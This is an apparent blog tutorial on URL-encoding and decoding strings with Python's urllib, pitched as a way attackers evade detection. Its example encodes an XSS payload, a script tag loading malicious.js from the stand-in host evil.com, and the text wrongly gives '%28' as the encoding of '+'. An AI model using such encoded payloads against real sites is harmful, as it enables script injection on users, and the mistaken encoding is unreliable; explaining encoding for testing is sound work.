URL Encoding to evade detection and identification with Python
URL encoding has become one of the most common way for attackers to bypass the detection that can be used in phishing attacks or in malicious scripts for unintended downloads(APT as well). The attacker takes the advantage of “URL Encoding” to encode the information in an URL/URI.
Server may restrict the access to the URL request after validation, hence the attacker will try to bypass the identification by encoding the payload into different encoded format.
“URI” or “Uniform Resource Identifier” is an instrument to retrieve the existing resources by name, location or both and it includes the values like Scheme, domain, port, query and path.
The allowed characters in URI can be classified into ‘reserved’ or ‘unreserved’, where reserved characters may have special purpose of the usage, for example: ‘/’ (Path segment) and ‘=’ (value). The URI may have special characters that requires different treatment in order to be correctly interpreted for fetching the required resource.
As per the above table you can encode any of the “reserved” character by preceding “%” with the character’s ASCII byte value in hexadecimal digits. For example: Reserved Character “+” will first be prefixed with “%” and then “+” Hx values that is “2B”, so the final encoding value would be “%28”.
You can try it on your own: Click Here
Encoding the values in Python: I have written a very basic python script that can help you encode the values without any tool dependency.
import urllib.parse #Python Library
Url = "http://dummy/getdb.php?data=" #Url to test
Payload = "<script src=\"http://www.evil.com/malicious.js\"></script>" #Payload for testing SQL, XSS etc.
Encoded_Payload = urllib.parse.quote(Payload, safe ='') #Safe param specifies ASCII characters that should not be quoted. The default value is ‘/’ but I have explicitly provided “” means none.Encoded_url = Url + Encoded_Payload #Complete Payload
print(Encoded_url)#You may also extend this code to save values in CSV or directly try `hitting the server’.http://dummy/getdb.php?data=%3Cscript%20src%3D%22http%3A%2F%2Fwww.evil.com%2Fmalicious.js%22%3E%3C%2Fscript%3EGet Code: Click here
Python documentation: https://docs.python.org/3/library/urllib.parse.html
Decoding the values in Python: Just two lines script to decode the ‘Encoded Values’.
from urllib.parse import unquote #'Unquote' in the library for decoding.Decoded_Payload = unquote(Encoded_url) #Encoded Valueprint(Decoded_Payload) #Decoded value>http://dummy/getdb.php?data=<script src="http://www.evil.com/malicious.js"></script>Get Code: Click here
You may use multiple tools to achieve the same but my intent of this write-up is to explain the “URL Encoding & Decoding” in the simplest possible way by using Python.
Please feel free to reach out in case of any queries.
~AshishSecDev~
